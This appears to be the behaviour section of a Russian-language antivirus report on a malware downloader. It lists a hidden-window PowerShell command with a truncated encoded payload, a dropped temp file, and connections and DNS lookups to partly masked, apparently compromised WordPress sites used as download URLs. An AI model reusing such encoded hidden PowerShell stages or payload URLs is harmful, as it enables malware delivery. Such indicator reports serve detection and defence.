Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABNAGIAOQBpAHkAdQBuAD0AKAAoACcASwBvADcAJwArACcAcgBqACcAKQArACcAMAA3ACcAKQA7ACQARABrAGEAeAAyADYAdAA9ACQAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQQBpADgAOABrAGkAaQA9ACgAKAAnAFAAZg...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1428
- %TEMP%\1254076.cvr
- 'gu##ees.com':80
- 'pm####olutions.com':80
- 'pm####olutions.com':443
- 'co######o.redeunida.org.br':80
- 'co######o.redeunida.org.br':443
- http://gu##ees.com/wp-content/uploads/ezsJ/
- http://pm####olutions.com/wp-admin/Gs2nh/
- http://co######o.redeunida.org.br/wp-content/themes/HLEcW/
- 'pm####olutions.com':443
- 'co######o.redeunida.org.br':443
- DNS ASK gu##ees.com
- DNS ASK th####pply.co.uk
- DNS ASK go#####sseminary.org
- DNS ASK pm####olutions.com
- DNS ASK al####nabismeds.com
- DNS ASK us###ber.com
- DNS ASK co######o.redeunida.org.br
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABNAGIAOQBpAHkAdQBuAD0AKAAoACcASwBvADcAJwArACcAcgBqACcAKQArACcAMAA3ACcAKQA7ACQARABrAGEAeAAyADYAdAA9ACQAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQQBpADgAOABrAGkAaQA9ACgAKAAnAFAAZg... (со скрытым окном)